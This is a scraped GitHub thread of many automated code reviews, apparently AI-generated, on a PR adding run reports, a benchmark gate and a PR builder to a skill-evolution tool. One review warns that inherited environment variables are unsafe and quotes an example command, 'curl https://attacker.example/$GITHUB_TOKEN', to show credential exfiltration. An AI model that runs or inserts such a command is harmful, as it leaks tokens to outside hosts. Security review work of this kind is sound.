test_pr_builder_dry_run_is_deterministic_and_does_not_mutate_git): excellent — patching_run_gitand assertingcalls == []is exactly the right technique. - 150 tests pass, 0 failures.
Verdict: REQUEST_CHANGES — please resolve the subprocess env inheritance (import sys (
| completed = subprocess.run( | ||
| argv, | ||
| capture_output=True, | ||
| text=True, |
There was a problem hiding this comment.
subprocess.run here inherits the caller's full environment including GITHUB_TOKEN, OPENROUTER_API_KEY, etc. A benchmark command like curl https://attacker.example/$GITHUB_TOKEN would silently exfiltrate credentials.
Fix:
import os
completed = subprocess.run(
argv,
capture_output=True,
text=True,
timeout=benchmark_timeout_seconds,
env={"PATH": os.environ.get("PATH", "/usr/bin:/bin")}, # minimal env
)| import json | ||
| import shlex | ||
| import subprocess | ||
| import sys |
There was a problem hiding this comment.
sys is imported but never used anywhere in this module. Remove it to keep the file clean and avoid ruff F401.
Code Review — Automated Reviewer Pass
|
Code Review — PR #55: feat: add ingestion reports and promotion gatesVerdict: LGTM with notes — no critical issues; 2 warnings, 2 suggestions. This is a well-designed, conservatively scoped promotion slice. Security posture is solid throughout: benchmark commands are parsed with
|
Code Review — PR #55: feat: add ingestion reports and promotion gatesAuth:
|
jarrettj
left a comment
There was a problem hiding this comment.
Hermes Agent Review
Full read of all 8 changed files. No critical issues — this is clean work. Five minor observations as inline comments.
| elapsed_seconds: float, | ||
| report_dir: Path = Path("reports/runs"), | ||
| cost_estimate: Optional[dict] = None, | ||
| dry_run: bool = False, |
There was a problem hiding this comment.
dry_run API — the dry_run parameter is stored in safety.dry_run of the report JSON, but the function always writes files regardless of its value. Callers must manually avoid calling write_run_report() in dry-run mode (which evolve_skill.py correctly does). Consider adding a docstring note like "Callers are responsible for not invoking this function during dry runs" or an early-return guard: if dry_run: raise ValueError("write_run_report must not be called in dry-run mode").
|
|
||
| def _constraint_to_dict(result: ConstraintResult) -> dict: | ||
| if hasattr(result, "__dataclass_fields__"): | ||
| return asdict(result) |
There was a problem hiding this comment.
💡 Suggestion: fragile dataclass detection — hasattr(result, "__dataclass_fields__") is a private CPython implementation detail. The fallback dict(result) silently does the wrong thing for arbitrary objects. More robust: try: return asdict(result) except TypeError: return dict(result).
| benchmark_results.append({ | ||
| "command": command, | ||
| "returncode": None, | ||
| "stdout": (exc.stdout or "")[-4000:] if isinstance(exc.stdout, str) else "", |
There was a problem hiding this comment.
💡 Suggestion: dead isinstance check — when subprocess.run(..., text=True) is used, TimeoutExpired.stdout is always str | None, never bytes. The isinstance(exc.stdout, str) branch is dead code. Simplify to (exc.stdout or "")[-4000:] for both stdout and stderr lines (136 too).
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue | ||
| try: | ||
| candidate_count = len(importer_cls.extract_messages()) |
There was a problem hiding this comment.
describe_source_availability() calls importer_cls.extract_messages() with no limit. For users with a large Copilot session store (some grow to hundreds of MBs), this dry-run availability check can be unexpectedly slow. Consider passing a small limit=100 to give a meaningful candidate_count estimate without full enumeration.
| ) | ||
| console.print(f" Run report: {report_path}") | ||
|
|
||
| if run_benchmark_gate: |
There was a problem hiding this comment.
run_benchmark_gate is checked inside if write_report:, so passing --run-benchmark-gate --no-write-report silently skips the gate with no user-visible message. A one-liner guard before the block would surface this: if run_benchmark_gate and not write_report: console.print("[yellow]⚠ --run-benchmark-gate requires --write-report; skipping gate[/yellow]").
Code Review SummaryVerdict: LGTM with minor observations (0 critical, 2 warnings, 3 suggestions) Reviewed all 8 changed files: ✅ Looks Good
|
jarrettj
left a comment
There was a problem hiding this comment.
Code Review Summary — PR #55 feat: add ingestion reports and promotion gates
Note: This PR is already merged. Findings below are for record and future follow-up.
🔴 Critical
None.
⚠️ Warnings
-
evolution/core/external_importers.py—describe_source_availabilitycallsextract_messages()with no limit
In dry-run mode the function iterates the full source (potentially thousands of Copilot/Claude history entries) just to count candidates. For large installs this can be slow/expensive. Consider alimit=param on the importer or a separatecount_messages()fast path. -
evolution/core/benchmark_gate.py:130–143—TimeoutExpiredstdout/stderr bytes vs str mismatch
subprocess.runis called withtext=True, but when timeout fires before any outputexc.stdout/exc.stderrcan bebytesorNone. The guardif isinstance(exc.stdout, str)silently discards bytes output. Safer:(exc.stdout or b"").decode("utf-8", errors="replace")[-4000:](or drop the isinstance check and always.decode()sincetext=Trueshould guarantee str, butTimeoutExpireddoesn't honour that). -
evolution/core/run_report.py—"target"in_REQUIRED_FIELDSis too coarse
_get(report, "target")passes even when"target"isnullor{}. The field that actually matters for promotion review istarget.name. Suggest tightening to"target.name"(and"target.type") so a malformed report fails closed more reliably.
💡 Suggestions
-
external_importers.py:build_dataset_from_external— dedup key istask_inputonly
Two examples with the same input but different LLM-generatedexpected_behaviorlabels will silently drop the second. Using(task_input, expected_behavior)as the dedup key — or at minimum a comment explaining the intent — would make the behaviour explicit. -
evolution/core/pr_builder.py—ghabsence raisesFileNotFoundError, not a clean user error
When--open-pris passed withoutghinstalled,subprocess.run(["gh", ...], check=True)raises a rawFileNotFoundError. Wrapping withshutil.which("gh")or a try/exceptClickExceptionwould give a clear message. -
evolution/skills/evolve_skill.py—import jsoninsideif write_report:block
jsonis already imported at the top of the module (used formetrics.json), so the deferred import inside the block is harmless but slightly misleading. No code change needed, but the block comment could clarify the local imports are for lazy loading of optional deps.
✅ Looks Good
shlex.split+shell=Falsefor benchmark commands — correct mitigation for shell injection.- Fail-closed pattern on
_REQUIRED_FIELDS(early return on first missing field) is solid. SourceAvailabilitycleanly distinguishes missing path from an empty-but-present source — exactly the dry-run UX requested in #54._message()factory enforces a canonical metadata schema across all three importers (Claude Code, Copilot, Hermes) — good for future auditability.--no-write-reportescape hatch keeps default behaviour additive without breaking existing runs.- Test coverage is thorough: metadata roundtrip, gate pass/fail, CLI exit codes, timeout, dry-run non-mutation, and source availability distinction all covered.
- All 11 new tests pass locally.
Reviewed locally on branch pr-55 (checkout: git fetch origin pull/55/head:pr-55).
jarrettj
left a comment
There was a problem hiding this comment.
Hermes Agent Review
Two warnings should be addressed before merge. The rest of the code is clean — good security posture (shlex + no shell=True, no hardcoded secrets), clear separation of concerns, solid test coverage. See inline comments for details.
| console.print(f" Run report: {report_path}") | ||
|
|
||
| if run_benchmark_gate: | ||
| gate_result = evaluate_report(report_path) |
There was a problem hiding this comment.
evaluate_report(report_path) is called with all defaults (min_holdout_delta=0.0, max_artifact_growth=0.5, no benchmark commands). This means --run-benchmark-gate will always pass as long as constraints pass and holdout delta ≥ 0 — the full threshold surface exposed by benchmark_gate.py's own CLI is not reachable via evolve_skill.py. Consider forwarding at least --min-holdout-delta and --benchmark-command as evolve_skill.py CLI flags, or add a doc comment noting that fine-grained control requires invoking benchmark_gate.py standalone.
| if not path.exists(): | ||
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue | ||
| try: |
There was a problem hiding this comment.
💡 Suggestion: describe_source_availability calls extract_messages() (unbounded) just to count candidates. On a large Claude Code history this is a full scan per dry-run. extract_messages(limit=1) would suffice to confirm the source is readable; count only matters for reporting. Consider accepting an optional limit parameter here.
| return asdict(self) | ||
|
|
||
|
|
||
| _REQUIRED_FIELDS = [ |
There was a problem hiding this comment.
💡 Nit: "target" in _REQUIRED_FIELDS resolves to the {"type": ..., "name": ...} nested dict, not a scalar. The check works correctly (non-empty dict is truthy), but a brief comment like # presence-only — target is a nested dict would prevent future readers from wondering why a dict sits alongside scalar field paths.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review Summary — PR #55 · feat: add ingestion reports and promotion gates
Note: This PR is currently closed but not merged (no
mergeCommit). Review posted for audit purposes; the branchfix/54-ingestion-promotion-gatesis available for re-opening.
✅ Looks Good
- Security:
benchmark_gate.pyusesshlex.split()+subprocess.run(argv, ...)withoutshell=True— safe from shell injection. No secrets, noeval(), nopickle. - Secret filtering: consistently applied before dataset persistence across all three importers (Claude Code, Copilot, Hermes).
- Fail-closed gate:
evaluate_reportimmediately returnsFalseon any missing required field — correct defensive design. - Memory-safe hashing:
run_report._sha256reads in 1 MiB chunks — won't OOM on large artifacts. - Backward compatibility:
EvalExample.from_dictignores unknown keys;to_dictomits empty metadata so older JSONL consumers are unaffected. - Mutation opt-in:
pr_builder.pyonly touches git/remotes behind explicit--branch/--push/--open-prflags.--dry-runis non-mutative throughout. - Test coverage: two new test files (144 + 182 lines) cover the main paths — round-trip metadata, missing-vs-empty source availability, gate pass/fail/CLI exit codes.
⚠️ Warnings
evolution/core/external_importers.py — describe_source_availability calls extract_messages() with no limit
candidate_count = len(importer_cls.extract_messages()) # line ~694For large Claude Code history files or Hermes session directories this will load and parse every message just to count candidates — expensive for a dry-run status call. Pass a conservative upper bound or count files/entries without full extraction:
candidate_count = len(importer_cls.extract_messages(limit=1000))💡 Suggestions
-
evolution/core/benchmark_gate.py— stdout/stderr truncated from the tail, not the headcompleted.stdout[-4000:] # last 4000 chars
Most CLI tools emit the relevant error at the end, so this is defensible — but it's non-obvious and silently drops early output on verbose commands. Consider keeping a head+tail slice or documenting the intent.
-
evolution/core/dataset_builder.py—to_dictuses falsyif vfor metadatadata.update({k: v for k, v in metadata.items() if v})
An explicitly-set
message_role=""orrepo=""is silently dropped. The fields are all strings so this is fine in practice today, but preferif v is not Noneto make the intent explicit and survive future numeric/boolean additions. -
evolution/core/pr_builder.py— bare subprocess errors surface as tracebacks_run_git(check=True)and the rawsubprocess.run(["gh", ...])call raiseCalledProcessError/FileNotFoundErrorunhandled. A user withoutghon PATH gets a raw traceback. Consider wrapping withclick.ClickExceptionfor a clean message. -
evolution/skills/evolve_skill.py— double read/write of report for gate resultsAfter writing the report,
run_benchmark_gatereads it back from disk, mutates it, and writes it again. Not wrong, butwrite_run_reportcould accept an optionalbenchmark_gatefield to avoid the round-trip.
Branch checked out locally as pr-55 — ready to run:
python -m pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py -q
python -m pytest -q
Code Review SummaryVerdict: Changes Requested — 1 warning (functional) + 1 warning (gitignore), 2 minor suggestions, otherwise clean.
|
Code Review — PR #55:
|
Code Review SummaryVerdict: Comment (0 Critical, 1 Warning, 3 Suggestions — overall solid PR)
|
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — PR #55: feat: add ingestion reports and promotion gates
Reviewed by: automated reviewer (claude-sonnet-4-6)
All 150 tests pass (11 DSPy deprecation warnings, pre-existing and unrelated).
Summary
This PR delivers a clean, well-scoped auditable promotion slice. The three new modules (run_report.py, benchmark_gate.py, pr_builder.py) are small, single-purpose, and each defaults to the conservative/non-mutative path. The metadata propagation through EvalExample and the canonical _message() helper close a real audit gap. Test coverage is thorough and idiomatic.
Verdict: Approved. The issues below are all minor/informational; none block merge.
Critical Issues
None.
Warnings
1. describe_source_availability calls extract_messages() with no limit (potential performance regression on large Copilot histories)
/evolution/core/external_importers.py, line 690:
candidate_count = len(importer_cls.extract_messages())The old dry-run code had the same behaviour, so this is not a regression, but Copilot events files can be 100 MB+. Consider passing a reasonable limit (e.g. extract_messages(limit=500)) in the availability check so that dry-run stays cheap. Candidate count becomes "at least N" rather than exact, which is accurate enough for the status report.
2. write_run_report is never called with dry_run=True — the safety.dry_run field in the JSON report is always False
/evolution/skills/evolve_skill.py, lines 295–309 — the dry_run kwarg accepted by write_run_report is never forwarded from evolve(). The field exists in the schema and is explicitly set to False at line 121 of run_report.py. This is misleading in the promotion artifact. Fix: pass dry_run=dry_run to write_run_report(...).
Suggestions
3. Unused import sys in benchmark_gate.py
Line 8. sys is imported but never referenced. Remove it.
4. require_constraints is not exposed as a CLI flag on benchmark_gate.py
The parameter exists in evaluate_report() and is always True when invoked via CLI. This may be intentional (fail-closed is correct), but it makes it impossible to use the CLI to evaluate a report where constraints are advisory. A --no-require-constraints flag with a loud warning would give operators the escape hatch they'll inevitably need without compromising the default.
5. Deduplication in build_dataset_from_external runs after LLM scoring, not before
Lines 746–753. Identical task_input strings from multiple importers (e.g. a prompt that appears in both Claude Code history and a Hermes session) each burn an LLM scoring call before being deduplicated. Moving dedup before the RelevanceFilter.filter_and_score call would save cost. Low priority since max_examples * 3 caps the candidate set anyway.
6. pr_builder.py --open-pr path calls gh pr create without --base or --repo
Line 91–93. This is fine for the expected single-remote workflow, but if the user's git remote points to a fork, the PR will open against the fork's default branch rather than the upstream. Not a bug for current usage, but worth a doc comment.
7. Report paths store absolute paths to output/ artefacts
run_report.py lines 81, 87 record the absolute baseline_path / optimized_path. If the report is shared or the repo is moved, those paths become stale. Since the diff is also stored as a sidecar file, the absolute paths are mostly used for provenance. Consider also storing a project-relative path as a companion field.
Looks Good
shlex.split+shell=Falsefor benchmark commands: correct subprocess sandboxing._get()dotted-key traversal withKeyErroron missing nested keys: clean fail-closed pattern._importer_registry()refactor cleanly DRYs up the three call sites._message()canonical helper enforces consistent message schema across all three importers.EvalExample.to_dict()correctly omits empty metadata fields so existing golden JSONL files load without schema churn.EvalExample.from_dict()uses__dataclass_fields__— forward-compatible with older JSONL that lacks the new fields._source_counts()iteratesall_exampleswhich spans all splits — correct for a full provenance audit.all_constraints_passedrecalculates from the serialised constraint list rather than trusting the live object — correct for an immutable report.diff_pathsidecar written as unified diff with proper from/to labels.- Lazy imports of
benchmark_gate,run_report,pr_builderinsideevolve()avoid circular-import risk and keep the cold-start path light. - Test for timeout (
--benchmark-timeout-seconds 1+time.sleep(5)) verifies the guard actually fires. - Test for
describe_source_availabilitycorrectly distinguishesmissing_pathfromavailable + zero candidates— this was the key correctness gap called out in the issue.
jarrettj
left a comment
There was a problem hiding this comment.
Reviewed by automated reviewer (claude-sonnet-4-6). All 150 tests pass. Minor issues found (unused import, dry_run not forwarded to write_run_report, dedup placement, describe_source_availability perf on large Copilot histories). No critical or blocking issues. Full structured report posted as a comment.
jarrettj
left a comment
There was a problem hiding this comment.
Hermes Agent Review
Verdict: Comment — no blocking issues; two warnings and a few suggestions worth addressing before promoting.
See inline comments and the top-level summary comment for the full breakdown.
| _, importer_cls, path = importers[source] | ||
| if not path.exists(): | ||
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue |
There was a problem hiding this comment.
extract_messages() in dry-run path
describe_source_availability calls importer_cls.extract_messages() with no limit argument. On a user with a large Claude Code history this can be slow and memory-heavy for a lightweight dry-run check.
Consider passing a sentinel limit (e.g. limit=5000) or a dedicated count_messages() classmethod so the dry-run path stays cheap.
| report_dir.mkdir(parents=True, exist_ok=True) | ||
| timestamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ") | ||
| safe_target = target_name.replace("/", "-").replace(" ", "-") | ||
| report_path = report_dir / f"{timestamp}-{safe_target}.json" |
There was a problem hiding this comment.
dry_run parameter is never forwarded from evolve_skill.py
write_run_report accepts dry_run: bool = False but evolve_skill.py never passes it — safety.dry_run in every written report will always be False. The evolve() function returns early before this block when dry_run=True, so the report is never written during actual dry runs, but the parameter is a misleading dead-weight in the public API.
Suggestion: either thread dry_run=dry_run through the call in evolve_skill.py, or remove the parameter from write_run_report.
| @@ -656,6 +743,15 @@ def build_dataset_from_external( | |||
| all_messages, skill_name, skill_text, max_examples=max_examples, | |||
There was a problem hiding this comment.
💡 Suggestion — dedup key is task_input only
The deduplication loop uses only task_input as the key. Two examples from different sources with identical prompts but different expected_behavior values will silently drop the later one. A composite key like (task_input, source) or (task_input, expected_behavior) would be safer.
| "timeout_seconds": benchmark_timeout_seconds, | ||
| }) | ||
| failures.append(f"benchmark command timed out after {benchmark_timeout_seconds}s: {command}") | ||
| continue |
There was a problem hiding this comment.
💡 Suggestion — dead branch in TimeoutExpired handler
isinstance(exc.stdout, str) is always True here because subprocess.run was called with text=True. The fallback path is dead code. Remove the guard or add a comment explaining the defensive intent.
| click.echo(title) | ||
| click.echo("\n" + body) | ||
| return | ||
|
|
There was a problem hiding this comment.
💡 Suggestion — --push without --branch silently pushes current HEAD
A user who runs --push without --branch will push whatever branch is currently checked out, which could be main. Consider adding a guard or at minimum a warning when --push is used without --branch.
Code Review SummaryVerdict: Comment — no critical or blocking issues. Two warnings and three suggestions worth addressing before promoting to main.
|
jarrettj
left a comment
There was a problem hiding this comment.
Code Review Summary
Note: PR is closed; leaving this as a historical record for the audit trail.
⚠️ Warnings
-
evolution/core/external_importers.py —
describe_source_availability()
Callsimporter_cls.extract_messages()with nolimitargument, so it always performs a full traversal of potentially large history directories (e.g., a user with 50k Claude Code entries). The function is labeled as a "dry-run" availability check but does real work under the hood. Consider adding alimit=1probe or a configurable cap so availability checks are cheap. -
evolution/core/pr_builder.py:573 —
_run_git()
subprocess.run(..., check=True)raises a rawsubprocess.CalledProcessErroron push or branch failures, which propagates unhandled through the Click command and prints a Python traceback instead of a friendly error message. Wrapping intry/except subprocess.CalledProcessError as e: raise click.ClickException(str(e))would give users a clean failure path.
💡 Suggestions
-
evolution/core/benchmark_gate.py —
benchmark_timeout_secondsvalidation
No guard againstbenchmark_timeout_seconds <= 0. Passing0causes every benchmark command to immediately raiseTimeoutExpired; negative values are passed directly tosubprocess.runwhere behavior is implementation-defined. Aif benchmark_timeout_seconds <= 0: raise ValueError(...)at the top ofevaluate_reportwould be defensive. -
tests/core/test_issue54_promotion.py — timeout test
test_benchmark_gate_benchmark_command_timeout_fails_closedspawns a realpython -c 'import time; time.sleep(5)'subprocess with a 1-second timeout. On resource-constrained CI runners, Python startup alone can exceed 1s, making this marginally flaky. A mock onsubprocess.runthat raisessubprocess.TimeoutExpiredwould be deterministic. -
evolution/core/run_report.py — non-atomic report write
The.diffsidecar is written before the.jsonreport. If the process is interrupted between those two writes, the.diffis orphaned and the report is absent. Low probability but worth an atomic write pattern (write toreport_path.with_suffix('.tmp')thenrename) for the report file. -
evolution/skills/evolve_skill.py — benchmark gate update pattern
Whenrun_benchmark_gate=True, the gate result is patched into the report via a read → mutate → write cycle. An interruption between the read and write leaves the on-disk report in an inconsistent state. Same atomic-rename approach as above would help.
✅ Looks Good
benchmark_gate.pysecurity posture:shlex.split+shell=Falseis exactly right for user-supplied benchmark commands. Fail-closed design on every error path is correct.describe_source_availability()semantic clarity: The three-way distinction (missing path / path exists but empty / extraction error) is exactly what #54 asked for — much better than the previous silentextract_messages()call.- Deduplication in
build_dataset_from_external(): O(n) exact-match set ontask_input— simple, correct, and placed at the right stage (after LLM scoring, not before). run_report.pySHA-256 hashing: Chunked reads (1MB blocks) are memory-safe for large artifacts.- Mutation opt-in discipline: All remote-mutating operations (branch creation, push,
gh pr create) are behind explicit--branch,--push,--open-prflags. Default behavior is local and non-mutative.--dry-runremains fully non-mutative throughout. - Test coverage: Roundtrip metadata, fail-closed gate behaviour, CLI exit codes, benchmark command failure, timeout behaviour, and Git non-mutation are all explicitly verified. 150/150 passing, 11 DSPy deprecation warnings (harmless).
Verdict: APPROVE — No critical issues. The PR delivers the auditable promotion slice as described in #54 and all safety properties hold. The warnings above are non-blocking; the suggestions are optional hardening.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: 💬 Comment (2 warnings, 3 suggestions — nothing blocking, solid overall implementation)
⚠️ Warnings
- evolution/core/external_importers.py:690 —
describe_source_availabilitycallsextract_messages()with no limit, performing a full extraction just to count candidates. For users with large Claude Code/Copilot histories this makes--dry-rununexpectedly expensive. Useextract_messages(limit=1)for the reachability check, then only do the full count when explicitly requested — or add a dedicated lightweightpath_exists()check. - tests/core/test_issue54_promotion.py:147 —
time.sleep(5)with a 1-second timeout is flaky on slow CI. Python interpreter startup alone can be 300–500 ms on a loaded runner, leaving barely 500 ms of actual sleep. Preferpython -c 'while True: pass'(tight CPU loop that starts instantly) or increase the sleep to 30s with a 3-second timeout.
💡 Suggestions
- evolution/core/external_importers.py:749 — Dedup is keyed on
task_inputalone. Two sessions with the same question but differentsession_ids or sources will silently drop the second, reducing cross-source diversity. Deduping on(task_input, source)or(task_input, session_id)preserves more variety. - evolution/core/external_importers.py (
_importer_registry) — The registry returns a bare 3-tuple(label, cls, path). A@dataclass ImporterEntry(label, cls, path)would be self-documenting and cheap to extend if a 4th field is needed later. - evolution/core/pr_builder.py (
build_pr_text) — The test-plan section hardcodespython -m pytest tests/ -q. Inuv/pipenv/condaenvironments the reviewer's copy-paste will fail. Adding "(or equivalent for your environment)" avoids friction.
✅ Looks Good
shlex+shell=Falsefor benchmark commands — correctly prevents shell injection.- Fail-closed gate design — missing required fields fail rather than default to pass. The right choice for a promotion gate.
--dry-runremains non-mutative — the safety contract from the PR description is honoured throughout.pr_builder.pyremote mutation is fully opt-in — all three mutation flags are explicit; theif open_pr and not pushguard catches misconfiguration early.- Source metadata round-trips cleanly through
EvalExample.to_dict()/from_dict()— backward compatible with existing JSONL files. - SHA-256 hashes in the run report make artifact integrity verifiable after the fact.
- Secret filtering stays in place — no new code path bypasses
_contains_secret. sort_keys=Truethroughout JSON output — deterministic serialisation, diff-friendly reports.- stdout/stderr truncation in benchmark results (
[-4000:]) — prevents memory pressure from verbose benchmark commands. - Test coverage is solid — gate pass/fail/missing-fields, CLI exit codes, timeout, pr_builder no-mutation guarantee all covered.
Reviewed by Hermes Agent
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue | ||
| try: | ||
| candidate_count = len(importer_cls.extract_messages()) |
There was a problem hiding this comment.
extract_messages() is called here with no limit to count candidates, triggering a full extraction of the entire history file. For a --dry-run availability check this is unexpectedly expensive on large histories. Consider extract_messages(limit=1) to verify reachability, counting fully only when explicitly requested — or split into a fast path_exists() check and a separate count-on-demand API.
| deduped_examples = [] | ||
| seen_inputs = set() | ||
| for ex in examples: | ||
| if ex.task_input in seen_inputs: |
There was a problem hiding this comment.
💡 Suggestion: Dedup keyed on task_input alone silently drops examples that share the same question across different sessions or sources (e.g., two users who both asked 'review this PR' via Copilot and Claude Code). Deduping on (task_input, source) or (task_input, session_id) preserves cross-source diversity at zero extra cost.
| main, | ||
| [ | ||
| "--report", str(report_path), | ||
| "--benchmark-command", "python -c 'import time; time.sleep(5)'", |
There was a problem hiding this comment.
time.sleep(5) with a 1-second timeout leaves only 4 seconds of margin, but Python interpreter startup on a loaded CI runner can consume 300–800 ms, making this test intermittently flaky. Prefer python -c 'while True: pass' (tight CPU loop, no startup lag) or use time.sleep(30) with a 3-second timeout for a comfortable safety margin.
jarrettj
left a comment
There was a problem hiding this comment.
Hermes Agent Code Review — PR #55
Verdict: 💬 Comment (no critical blockers; 2 warnings, 1 suggestion)
All 11 new tests pass locally. The architecture is clean and the security posture is good. Three areas worth addressing in a follow-up.
⚠️ Warnings
-
benchmark_gate.py:87 — Zero-byte-baseline artifact growth is misleading
max(1.0, baseline_size)guards division-by-zero but silently mis-computes growth whenbaseline_size == 0. A genuinely new 100-byte file gets growth = (100-0)/1.0 = 100 = 10,000%, which always fails the default 50% gate. Operators starting from a blank slate will be surprised. Consider special-casingbaseline_size == 0(either skip growth check or use a sentinel float likeinf). -
external_importers.py:690 — Full extraction just to count candidates
describe_source_availabilitycallsimporter_cls.extract_messages()with no limit, triggering a complete disk read of potentially thousands of sessions purely to getlen(). In dry-run mode this is the main user-visible wait. Alimit=parameter (e.g. 10,000) or a lightweightcount_messages()classmethod would keep dry-runs snappy.
💡 Suggestions
- pr_builder.py:87 —
git checkout -Bsilently clobbers an existing branch
-Bforce-creates the branch regardless of whether it already exists. If the operator re-runs--branch evolve/demoafter a partial push, the local branch tip is reset without warning. Prefer-b(fails fast if branch exists) or add a pre-flightgit branch --list {branch}check.
✅ Looks Good
- Canonical
_message()factory eliminates copy-paste schema drift across all three importers — clean refactor. - Fail-closed gate:
_REQUIRED_FIELDSpre-check runs before any threshold evaluation; missing data never silently passes. shell=False+shlex.split()for benchmark commands — no shell injection surface.- Lazy imports inside
if write_report:block inevolve_skill.py— promo-artifact deps don't load on every run. - Deduplication by
task_inputinbuild_dataset_from_externalis the right default for training data hygiene. - All 11 new tests pass; coverage spans roundtrip, metadata propagation, gate pass/fail, CLI exit codes, timeout, and PR builder determinism.
Reviewed locally on branch pr-55. Tests: 11 passed, 11 DSPy deprecation warnings (pre-existing, upstream).
| optimized_size = float(_get(report, "optimized.size_bytes")) | ||
| holdout_delta = float(_get(report, "scores.holdout_delta")) | ||
| constraints_passed = bool(_get(report, "constraints.all_passed")) | ||
| artifact_growth = (optimized_size - baseline_size) / max(1.0, baseline_size) |
There was a problem hiding this comment.
max(1.0, baseline_size) guards division-by-zero but produces a misleading growth figure when baseline_size == 0. A new 100-byte file computes growth as (100-0)/1.0 = 100 = +10,000%, always failing the default 50% gate. Consider special-casing zero-byte baselines (skip the check, or set growth to float('inf') and document why).
| statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0)) | ||
| continue | ||
| try: | ||
| candidate_count = len(importer_cls.extract_messages()) |
There was a problem hiding this comment.
extract_messages() is called with no limit, performing a full disk scan of all sessions just to get a count. In large workspaces this dominates dry-run time. Consider a limit= kwarg (e.g. limit=10_000) or a cheap count_messages() classmethod to keep dry-runs sub-second.
| raise click.ClickException("--open-pr requires --push") | ||
|
|
||
| if branch: | ||
| _run_git(["checkout", "-B", branch]) |
There was a problem hiding this comment.
💡 Suggestion: git checkout -B pr-55 force-creates the branch, silently clobbering it if it already exists and has diverged (e.g. after a partial push). Prefer -b to fail-fast on collision, or pre-check with git branch --list pr-55 and prompt the operator.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — PR #55: feat: add ingestion reports and promotion gates
Verdict: Request Changes — the implementation is solid and well-tested, but a handful of issues (one correctness concern, one silent double-extraction performance trap, unused imports flagged by ruff, and a missing .gitignore entry) should be addressed before merge.
Summary
This PR implements the first auditable promotion slice from #54: canonical source metadata on ingested examples, machine-readable run reports (run_report.py), a conservative benchmark gate (benchmark_gate.py), a local-first PR body builder (pr_builder.py), and wiring in evolve_skill.py. The design is conservative (fail-closed, dry-run safe, no remote mutation by default) and the test coverage is good (11 new tests, all 150 pass).
Critical
None.
Warnings (should be fixed before merge)
1. describe_source_availability does a full extract_messages() on every dry-run call (external_importers.py L690). For large session databases (Copilot can be 100 MB+ per the module docstring), this loads every message just to count candidates. Either pass a small limit= or add a separate lightweight count_messages() method. As-is this can silently make --dry-run extremely slow.
2. write_report=True default means every evolution run (including failed/non-improving ones) writes reports and diff sidecar files to reports/runs/ with no cleanup policy. The directory is not in .gitignore, so it will accumulate indefinitely and could be accidentally committed. Either add reports/runs/ to .gitignore or document the cleanup policy in the README. Relatedly, run reports store absolute path strings for baseline/optimized/diff — these will be meaningless on a different machine reviewing the report.
3. evaluate_report is called in evolve_skill.py with no threshold arguments (line 313), so min_holdout_delta defaults to 0.0. This means the gate passes even when the evolved skill shows zero improvement — which defeats much of its purpose. At minimum the gate should require min_holdout_delta > 0, or evolve_skill should expose --min-holdout-delta and thread it through.
4. Unused import sys in benchmark_gate.py (line 8) and unused imports Panel, get_hermes_agent_path, LLMJudge, FitnessScore in evolve_skill.py — flagged by ruff check. These are pre-existing for evolve_skill.py but sys in benchmark_gate.py is new with this PR.
Suggestions (non-blocking)
-
run_report.pyL52 — mutable default argumentreport_dir: Path = Path("reports/runs"): In Python,Path(...)is evaluated at import time. WhilePathobjects are immutable so this won't cause the classic mutable-default bug, it is still an unusual pattern for library functions. Consider usingreport_dir: Path | None = Noneand resolving the default inside the function body for clarity. -
pr_builder.py--open-prdoes not pass--baseor--headtogh pr create: The resulting PR will default to the repo's default branch as base. If the user is on a detached or unexpected branch this could open against the wrong target. Documenting the expectation or adding--basewould harden this. -
describe_source_availabilityinexternal_importers.pyis both the dry-run display path (CLI) and a callable function, but its output is only printed in the CLI path. The function is well-structured for reuse, but callers should be aware of the performance note in warning #1. -
No test for the
write_reportintegration inevolve_skill.py: The newwrite_reportblock inevolve_skill.evolve()is only exercised through unit tests of the individual modules (run_report,benchmark_gate,pr_builder). An integration test that callsevolve()with a minimal mock would close this gap. -
_constraint_to_dictfallbackdict(result)inrun_report.py(line 28) is a silent catch-all: ifConstraintResultever changes shape, this will silently produce unexpected output. A more explicit fallback or a type check would be safer.
Looks Good
shlex.split+shell=Falsesubprocess inbenchmark_gate.py— correct shell injection prevention.capture_output=True, timeout=benchmark_timeout_secondsper command — correct.fail-closedon every missing required field before running numeric checks — correct gate ordering.--dry-runinevolve_skill.pyreturns before the report block — no accidental writes.- Secret filtering happens before dataset persistence and is unchanged.
EvalExample.from_dictcorrectly ignores unknown keys via__dataclass_fields__filtering.- Deduplication of examples by
task_inputis in the right place (after relevance scoring, before splitting). - Test coverage for timeout, non-zero exit, missing fields, deterministic PR body, and metadata roundtrip is thorough.
jarrettj
left a comment
There was a problem hiding this comment.
Code Review — feat: add ingestion reports and promotion gates
Overall verdict: Request Changes — the implementation is solid and the direction is correct, but there are ruff lint failures that need to be cleaned up before merge (the CI workflow checks both ruff check and ruff format).
Test suite
All 150 tests pass (11 new tests for this PR, 139 pre-existing). No regressions. DSPy deprecation warnings are pre-existing and unrelated to this PR.
Critical / Blocking
None — no correctness bugs or security issues found.
Warnings (must fix before merge — CI will fail)
1. ruff check failures (10 errors, all auto-fixable)
evolution/core/benchmark_gate.py:8 — F401: `sys` imported but unused
evolution/skills/evolve_skill.py:18 — F401: `rich.panel.Panel` imported but unused
evolution/skills/evolve_skill.py:21 — F401: `get_hermes_agent_path` imported but unused
evolution/skills/evolve_skill.py:24 — F401: `LLMJudge` imported but unused
evolution/skills/evolve_skill.py:24 — F401: `FitnessScore` imported but unused
evolution/skills/evolve_skill.py:78 — F541: f-string without placeholders (×5 instances)
Fix with: ruff check --fix evolution/ && ruff format evolution/ tests/
2. ruff format failures — all 8 changed files need reformatting. The CI workflow runs ruff format --check and will fail on the current diff.
Suggestions (non-blocking)
3. require_constraints not exposed in the CLI
